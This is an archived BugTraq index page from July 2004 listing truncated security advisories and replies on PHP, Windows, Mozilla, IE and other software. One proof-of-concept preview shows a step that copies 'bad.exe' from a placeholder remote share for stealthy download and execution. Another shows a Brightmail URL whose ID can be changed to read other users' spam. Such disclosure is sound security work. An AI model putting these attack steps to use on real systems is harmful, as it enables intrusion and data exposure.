BugTraq Mode:
(Page 1479 of 1748)  < Prev  1474 1475 1476 1477 1478 1479 1480 1481 1482 1483 1484  Next >
[security bulletin] SSRT4741 rev.1 DCE for HP OpenVMS Potential RPC Buffer Overflow Attack VU#259796, VU#568148, VU#326746 2004-07-14
Boren, Rich (SSRT) (rich boren hp com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HP SECURITY BULLETIN

HPSBOV01056_1 REVISION: 1

TITLE: SSRT4741 Rev.1 DCE for HP OpenVMS Potential RPC
Buffer Overrun Attack

NOTICE: There are no restrictions for distribution of this
Bulletin provided that it remains complete a

[ more ]  [ reply ]
RE: [Full-Disclosure] Re: IE Shell URI Download and Execute, POC 2004-07-14
Ferruh Mavituna (ferruh mavituna com)
> Is the vulnerability mitigated by
> today's Microsoft patch?

Both of POCs are working well (at least in my system -W2K3 all patches-)
after recent MS patches.

Can anyone confirm this ?

Ferruh.Mavituna
http://ferruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc

> -----Original Me

[ more ]  [ reply ]
RE: HijackClick 3 2004-07-14
http-equiv (at) excite (dot) com [email concealed] (1 malware com)


Thor Larholm ha scritto nel messaggio:

> From: Drew Copley
> > In fact, I don't think there has been a bug in about ten
> > months (coincidentally) that does not rely on either
Jelmer's
> > adodb bug or your shell.application bug.

> I'm sorry, but did everybody suddenly forget about codeBa

[ more ]  [ reply ]
Advisory 11/2004: PHP memory_limit remote vulnerability 2004-07-13
Stefan Esser (s esser e-matters de)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

e-matters GmbH
www.e-matters.de

-= Security Advisory =-

Advisory: PHP memory_limit remote vulnerability
Release Date: 2004/07/14
Last Modified: 2004/07/14
Autho

[ more ]  [ reply ]
[ GLSA 200407-11 ] wv: Buffer overflow vulnerability 2004-07-14
Thierry Carrez (koon gentoo org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[ more ]  [ reply ]
Advisory 12/2004: PHP strip_tags() bypass vulnerability 2004-07-13
Stefan Esser (s esser e-matters de)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

e-matters GmbH
www.e-matters.de

-= Security Advisory =-

Advisory: PHP strip_tags() bypass vulnerability
Release Date: 2004/07/14
Last Modified: 2004/07/14
Autho

[ more ]  [ reply ]
Ref: http://www.securityfocus.com/archive/1/367866, Jul 1 2004 1:19PM, Subj: Brightmail leaks other user's spam 2004-07-14
Sym Security (secure symantec com)
Thomas Springer posted:

Brightmail Spamfilter 6.0 offer a possibility to manage mails identified
as spam in a http-driven "control-center" on the
Brightmail-Server via links like
http://SERVER:41080/brightmail/quarantine/viewMsgDetails.do?id=QMsgView-
3;3-0

Simply altering the last numbers in th

[ more ]  [ reply ]
Microsoft Windows Task Scheduler '.job' Stack Overflow 2004-07-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Microsoft Windows Task Scheduler '.job' Stack Overflow
Confirmed Systems Affected: Microsoft Windows XP
Systems Reportedly Affected: Windows 2000 and Windows NT SP6 with
Microsoft Internet Explorer 6.
Severity: Criti

[ more ]  [ reply ]
Unchecked buffer in mstask.dll 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= Unchecked buffer in mstask.dll
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
=
= Affected Software:
= Microsoft Windows 2000 Service Pack 4
= Microsoft Windows XP, Microsoft Windo

[ more ]  [ reply ]
HtmlHelp - .CHM File Heap Overflow 2004-07-14
Brett Moore (brett moore security-assessment com)
========================================================================

= HtmlHelp - .CHM File Heap Overflow
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-023.mspx
=
= Affected Software:
= Microsoft Windows 98, 98SE, ME
= Microsoft Windows NT 4.0
= Microsoft Win

[ more ]  [ reply ]
RE: Re: HijackClick 3 2004-07-12
Drew Copley (dcopley eEye com)


> -----Original Message-----
> From: http-equiv (at) excite (dot) com [email concealed] [mailto:1 (at) malware (dot) com [email concealed]]
> Sent: Monday, July 12, 2004 12:06 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Cc: NTBugtraq (at) listserv.ntbugtraq (dot) com [email concealed]
> Subject: Re: HijackClick 3
>

<snip>

> This is absolutely fantastic Paul, with a patented double-cli

[ more ]  [ reply ]
RE: Norton AntiVirus Denial Of Service Vulnerability [Part: !!!] 2004-07-13
Sym Security (secure symantec com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Symantec is aware and currently investigating this issue.

- - ------------------------------------------------------------------
Symantec Product Security Team
Symantec takes the security of our products seriously and is a
responsible disclosure compan

[ more ]  [ reply ]
Find the tag continued 2004-07-13
James C. Slora, Jr. (james slora phra com)
Takeoff from http-equiv's notes about closing >

By design, unprocessable HTML tags and tag parameters are ignored during
parsing. An amazing amount of worthless obfuscating stuff can be
inserted before the closing > of a valid tag, and the parameters for the
tag can be tough to find.

Mail filteri

[ more ]  [ reply ]
aterm 0.4.2 tty permission weakness 2004-07-13
Maarten Tielemans (TTIelu_DaInfraCrew hotmail com)


Aterm has an issue with creating a terminal.

A quick ?ls ?al? on a aterm with ?mesg y? shows:

crw--w--w- 1 alsdk users 5, 3 Jul 13 17:27 /dev/ttyp3

with ?mesg n?:

crw-----w- 1 alsdk users 5, 3 Jul 13 17:28 /dev/ttyp3

1) World (nobody) is able to ?echo? or ?cat? towards the t

[ more ]  [ reply ]
phrack #62 has been released 2004-07-13
phrack staff (rm segfault net)
Hi,

Tue Jul 13 00:58:42 UTC - PHRACK #62 HAS BEEN RELEASED.

*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG ****

PHRACK MAGAZINE is one of the longest running electronic magazines

[ more ]  [ reply ]
IE Shell URI Download and Execute, POC 2004-07-13
Ferruh Mavituna (ferruh mavituna com)
Hello;

Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
Jelmer) message. I just added a new feature "download" and then execute
application. Also I use Wscript.Shell in Javascript instead of
Shell.Application.

1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
2- Wait fo

[ more ]  [ reply ]
Re: Two Vulnerabilities in Mozilla may lead to remote compromise 2004-07-13
Mind Warper (mindwarper linuxmail org)
In-Reply-To: <20040713101632.21299.qmail (at) www.securityfocus (dot) com [email concealed]>

Thanks to SecuriTeam for pointing out that the known path vulnerability does not work. Since I got default.nop, it seemed to me as if this is normal, but actually the last 3 letters are random.

The NULL byte bug on the other hand st

[ more ]  [ reply ]
RE: Norton AntiVirus Denial Of Service Vulnerability [Part: !!!] 2004-07-13
Sym Security (secure symantec com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Symantec Product Security Team
Symantec takes the security of our products seriously and is a
responsible disclosure company. You can view our response policies
at http://www.symantec.com/security.
We will work directly with anyone who believes they h

[ more ]  [ reply ]
Microsoft Window Utility Manager Local Elevation of Privileges 2004-07-13
Vivek Rathod (Application Security, Inc.) (vrathod appsecinc com) (1 replies)
Microsoft Window Utility Manager Local Elevation of Privileges

July 13, 2004

Credit: This vulnerability was researched and discovered by Cesar Cerrudo.

Risk Level: High

Summary: A local elevation of privileges exists in the Windows Utility
Manager which allows any user to take complete control

[ more ]  [ reply ]
Re: Microsoft Window Utility Manager Local Elevation of Privileges 2004-07-14
Chris Paget (ivegotta tombom co uk)
Re: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability 2004-07-13
http-equiv (at) excite (dot) com [email concealed] (1 malware com)


<!--

How bad is this problem? Critical. With minimal effort, a
malicious website owner
could install viruses or spyware on the visitor's computer.

-->

this just opens up a whole big can of worms. Phried Phish Phor
everyone.

http://www.malware.com/pauls.html

https is even phunner.

phew.

[ more ]  [ reply ]
@stake advisory: WebSTAR (5.3.2 and below) Multiple Vulnerabilities 2004-07-13
Advisories (advisories atstake com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

@stake, Inc.
www.atstake.com

Security Advisory

Advisory Name: WebSTAR 5.3.2 Multiple Vulnerabilities
Release Date: 07/13/2004
Application: WebSTAR 5.3.2 an

[ more ]  [ reply ]
RE: MSIE Download Window Filename + Filetype Spoofing Vulnerability 2004-07-12
Drew Copley (dcopley eEye com)


> -----Original Message-----
> From: Polazzo Justin [mailto:Justin.Polazzo (at) facilities.gatech (dot) edu [email concealed]]
> Sent: Monday, July 12, 2004 12:22 PM
> To: Drew Copley
> Cc: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: RE: MSIE Download Window Filename + Filetype
> Spoofing Vulnerability
>
> Should you not be able

[ more ]  [ reply ]
Re: Two Vulnerabilities in Mozilla may lead to remote compromise 2004-07-13
Philliph (bugtraq regedit sk)
In-Reply-To: <20040713101632.21299.qmail (at) www.securityfocus (dot) com [email concealed]>

Re: Vulnerability No. 1: Mozilla stores cache data in directory with random name, so it definitely isn´t vulnerable

(the directory is %appdata%\Mozilla\Profiles\_name_of_profile_\_random_name_\Cache )

Re: Vulnerability No. 2:

[ more ]  [ reply ]
Moodle XSS Vulnerability 2004-07-13
Thomas Waldegger (morpheus buha info)


Moodle XSS Vulnerability (13.07.04)

Vendor: Moodle

URL: http://moodle.org/

Version: Moodle 1.3.2+, Moodle 1.4 dev

Risk: XSS

Description:

"Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses."

See http://moo

[ more ]  [ reply ]
Two Vulnerabilities in Mozilla may lead to remote compromise 2004-07-13
Mind Warper (mindwarper linuxmail org) (3 replies)


Two Vulnerabilities in Mozilla may lead to remote compromise.

=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=

----------------------

Vendor Information:

----------------------

Homepage : http://www.mozilla.org

Vendor : informed on 11/06/04

Mailed advisory: 13/06/04

[ more ]  [ reply ]
RE: Two Vulnerabilities in Mozilla may lead to remote compromise 2004-07-13
Darren Pilgrim (dmp bitfreak org)
Re: Two Vulnerabilities in Mozilla may lead to remote compromise 2004-07-13
Daniel Veditz (dveditz cruzio com)
RE: MSIE Download Window Filename + Filetype Spoofing Vulnerability 2004-07-12
Polazzo Justin (Justin Polazzo facilities gatech edu)
Should you not be able to tile your gui any way you please?

Someone may be thinking that you could put an image in front of the security box in order to trick users into clicking on "open" without knowledge. I noticed that you cant click on the buttons when the image is in front of them.

Would yo

[ more ]  [ reply ]
(Page 1479 of 1748)  < Prev  1474 1475 1476 1477 1478 1479 1480 1481 1482 1483 1484  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus